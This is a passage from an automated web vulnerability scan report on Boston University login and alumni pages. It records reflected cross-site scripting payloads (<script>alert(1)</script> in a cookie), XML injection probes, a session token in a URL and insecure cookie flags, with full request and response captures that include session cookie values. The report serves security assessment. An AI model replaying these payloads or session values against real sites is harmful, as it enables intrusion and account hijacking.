Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:36 GMT
Connection: close
Content-Length: 13325


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head
...[SNIP]...
<a href="http://www.wbur.org/2011/10/05/democrats-debate903d1\"><script>alert(1)</script>a76406f8e7e">
...[SNIP]...

1.32. https://weblogin.bu.edu/accounts/forgot [weblogin3 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /accounts/forgot

Issue detail

The value of the weblogin3 cookie is copied into the HTML document as plain text between tags. The payload c61c8<script>alert(1)</script>c18c15d09d was submitted in the weblogin3 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /accounts/forgot HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4c61c8<script>alert(1)</script>c18c15d09d; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:50:52 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: ToyY@grxHDsAAFiDanUAAABH
X-BU-Duration: D=2111714
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 379

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><title>[LOOP] Get New authref Error</title>
</head><body><FONT color="#CC
...[SNIP]...
<p>Could not look up (cussp-srv4c61c8<script>alert(1)</script>c18c15d09d)</p>
...[SNIP]...

1.33. https://weblogin.bu.edu/webnew/alumnew [weblogin3 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /webnew/alumnew

Issue detail

The value of the weblogin3 cookie is copied into the HTML document as plain text between tags. The payload 7ef9e<script>alert(1)</script>94789dc5fec was submitted in the weblogin3 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /webnew/alumnew HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/alumni/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv47ef9e<script>alert(1)</script>94789dc5fec; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.20.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:32:58 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: Toyi2grxGjUAAB3mz5MAAAAM
X-BU-Duration: D=81835
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 368

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><title>[LOOP] Error</title>
</head><body><FONT color="#CC0000"><b><p>Could not look up (cussp-srv47ef9e<script>alert(1)</script>94789dc5fec)<br>
...[SNIP]...

2. XML injection  previous  next
There are 3 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


2.1. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /link]]>>/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 05 Oct 2011 18:30:37 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
X-BU-Main-Uniqueid: ToyiTQrxHDYAAGUzwsEAAADY
X-BU-Duration: D=539422
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<!--
Your error file at: "/home/error/404.html"
was parsed by the serve
...[SNIP]...
<strong>http://www.bu.edu/link]]>>/bin/uiscgi_alumni_directory_harris_xml.pl/prelogin</strong>
...[SNIP]...

2.2. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /link/bin]]>>/uiscgi_alumni_directory_harris_xml.pl/PreLogin HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 05 Oct 2011 18:30:46 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
X-BU-Main-Uniqueid: ToyiVgrxHDYAAGV6yXIAAARX
X-BU-Duration: D=591648
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<!--
Your error file at: "/home/error/404.html"
was parsed by the serve
...[SNIP]...
<strong>http://www.bu.edu/link/bin]]>>/uiscgi_alumni_directory_harris_xml.pl/prelogin</strong>
...[SNIP]...

2.3. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /link/bin/uiscgi_alumni_directory_harris_xml.pl]]>>/PreLogin HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 05 Oct 2011 18:30:52 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiXArxHDYAAGVNxu0AAAOY
X-BU-Duration: D=21542
X-BU-Backend: builtin (null)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /link/bin/uiscgi_alumni_directory_harris_xml.pl]]&gt;&gt;/PreLogin was not found on this server.</p>
...[SNIP]...

3. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.bu.edu
Path:   /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin?session=a48b5fc44e9c3778dbfa93d21a2f878d:cussp-srv3&AuthServCd=it_kerb&LoginPromptInd=ON&SidPromptInd=&reason=Initial%2520request%2520for%2520authentication&app=Alumni%2520Directory%2520Harris&contact=%253Ca%2520href%253D%2522mailto%253Aacct-mgr%2540bu.edu%2522%253EAccount%2520Manager%253C%252Fa%253E&ext=alum&OptimisticLoginInd=ON&LoginPromptTime=1317837692&SidCheckPromptTime= HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.19.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3

Response

HTTP/1.1 302 Found
Date: Wed, 05 Oct 2011 18:01:33 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Location: https://weblogin.bu.edu/web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.8971
Content-Length: 293
Content-Type: text/html; charset=iso-8859-1
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToybfQrxHDYAAEnch14AAAKc
X-BU-Duration: D=288046
X-BU-Backend: builtin (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://weblogin.bu.edu/web@login3/1317837693/5
...[SNIP]...

4. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /webnew/alumnew

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /webnew/alumnew HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/alumni/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.20.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:05:25 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: ToycZQrxHDsAAFwVZ3oAAAAS
X-BU-Duration: D=16292141
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 29113


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_ddmenu_sidenav.dwt" codeOutsideHTMLIsLocked=
...[SNIP]...
<table width="100%" border="0" cellpadding="7" cellspacing="0">


<form method="post" action="https://weblogin.bu.edu/webnew/alumnew" enctype="application/x-www-form-urlencoded" onsubmit="return dosubmit()">

<input type="hidden" name="_authref" value="5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4" />
...[SNIP]...
<td width="64%">&nbsp;<input name="_password1" type="password" size="25" maxlength="32" class="formtextfield" value="">
<br>
...[SNIP]...
<td width="64%">&nbsp;<input name="_password2" type="password" maxlength="32" size="25" class="formtextfield" value=""></td>
...[SNIP]...

5. SSL cookie without secure flag set  previous  next
There are 48 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


5.1. https://weblogin.bu.edu//web@login3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   //web@login3

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET //web@login3?jsv=1.5p&br=un&fl=0 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; isMobile=false_1.1; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:03 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyYUwrxHDsAAEIXd9Q
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:48:03 GMT
Set-Cookie: wl4cap=1317836883%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyYUwrxHDsAAE4ID5sAAAAF
X-BU-Duration: D=167725
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2729

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...

5.2. https://weblogin.bu.edu/accounts/bulogin-forgotaccount  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /accounts/bulogin-forgotaccount

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/bulogin-forgotaccount?template_extension=forgot&_last_name=xss&_email_address=xss HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 05 Oct 2011 17:50:12 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Content-Type: text/html; charset=iso-8859-1
X-BU-Main-Uniqueid: ToyY1ArxHDsAAFj0ixgAAABE
X-BU-Duration: D=195964
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 524

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>500 Internal Server Error</TITLE>
</HEAD><BODY>
<H1>Internal Server Error</H1>
The server encountered an internal error or
miscon
...[SNIP]...

5.3. https://weblogin.bu.edu/accounts/content/js/main.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /accounts/content/js/main.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/content/js/main.js HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:56 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 06 Oct 2009 20:48:07 GMT
ETag: "4e4d-421-4acbad07"
Accept-Ranges: bytes
Content-Length: 1057
Content-Type: application/x-javascript
X-BU-Main-Uniqueid: ToyYwwrxHDsAAFhwPPQAAAA1
X-BU-Duration: D=1058357
X-BU-Backend: (null) (null)
Connection: close

$(document).ready(function() {
// Edit this to make the default end date be "n" months
// ahead of whatever the user enters for the start date:
//
var DEFAULT_END_DATE_MONTHS = 1;


...[SNIP]...

5.4. https://weblogin.bu.edu/accounts/forgot  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /accounts/forgot

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/forgot HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:55 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Expires: Tue, 04 Oct 2011 17:49:56 GMT
pragma: no-cache
cache-control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: ToyYwwrxHDsAAFhRhSAAAAAf
X-BU-Duration: D=1537718
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 6527


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>
[1] BU Accounts | Identify Forgot
</title>
<meta http-equiv="Content-Type" content="text/html;">
<!--Fireworks M
...[SNIP]...

5.5. https://weblogin.bu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
